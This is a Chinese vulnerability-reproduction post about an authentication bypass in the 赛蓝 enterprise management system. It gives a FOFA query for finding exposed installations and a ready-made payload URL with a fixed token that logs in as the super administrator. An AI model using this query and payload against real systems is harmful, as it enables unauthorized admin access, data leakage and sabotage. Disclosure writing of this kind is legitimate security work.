漏洞复现-赛蓝-企业管理系统

本文来自无问社区,更多漏洞复现可前往查看http://www.wwlib.cn/index.php/index

0x01 产品简介

赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平。

0x02 漏洞概述

赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。

建议升级到最新版本

已修复

0x03 复现环境

复制代码
FOFA:body="www.cailsoft.com" || body="赛蓝企业管理系统"

payload:

复制代码
/AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f

效果图:

相关推荐
Rick199316 分钟前
慢SQL优化
数据库·python·sql
一个有温度的技术博主1 小时前
网安实验系列一:Burp Suite探测敏感信息路径
网络·安全
123过去3 小时前
responder使用教程
linux·网络·测试工具·安全·哈希算法
路baby3 小时前
BurpSuite基础功能实战演示讲解
安全·web安全·网络安全·系统安全·burpsuite
西杭5 小时前
Claude读论文系列(四)
安全
李白你好5 小时前
Linux 主机安全巡检与应急响应工具
linux·安全
不一样的故事1265 小时前
抓重点、留弹性、重节奏
大数据·网络·人工智能·安全
努力的lpp5 小时前
小迪安全第10天:HTTP数据包分析与构造
网络协议·安全·http
爱学习的小囧5 小时前
VMware ESXi V7 无 vCenter 虚拟机磁盘缩减攻略:安全释放存储空间(不丢数据)
服务器·网络·windows·安全·esxi·虚拟化
桌面运维家6 小时前
Windows 10打印机端口占用:高效释放与安全配置指南
windows·安全